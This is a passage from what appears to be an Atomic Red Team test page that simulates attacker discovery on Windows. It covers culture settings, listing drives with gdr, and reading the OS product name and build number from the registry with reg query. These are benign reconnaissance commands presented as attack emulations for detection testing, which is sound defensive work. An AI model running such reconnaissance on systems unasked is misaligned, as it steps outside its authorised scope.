powershell.exe -c "Get-Culture | Format-List | Out-File -FilePath %TMP%\a.txt"
```
#### Cleanup Commands:
```cmd
cmd.exe /c del "%TMP%\a.txt"
```
<br/>
<br/>
## Atomic Test #38 - Enumerate Available Drives via gdr
This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
**Supported Platforms:** Windows
**auto_generated_guid:** c187c9bc-4511-40b3-aa10-487b2c70b6a5
#### Attack Commands: Run with `command_prompt`!
```cmd
powershell.exe -c "gdr -PSProvider 'FileSystem'"
```
<br/>
<br/>
## Atomic Test #39 - Discover OS Product Name via Registry
Identify the Operating System Product Name via registry with the reg.exe command.
Upon execution, the OS Product Name will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7
#### Attack Commands: Run with `command_prompt`!
```cmd
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
```
<br/>
<br/>
## Atomic Test #40 - Discover OS Build Number via Registry
Identify the Operating System Build Number via registry with the reg.exe command.
Upon execution, the OS Build Number will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** acfcd709-0013-4f1e-b9ee-bc1e7bafaaec
#### Attack Commands: Run with `command_prompt`!
```cmd
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber
```
<br/>
Reference in New Issue View Git Blame Copy Permalink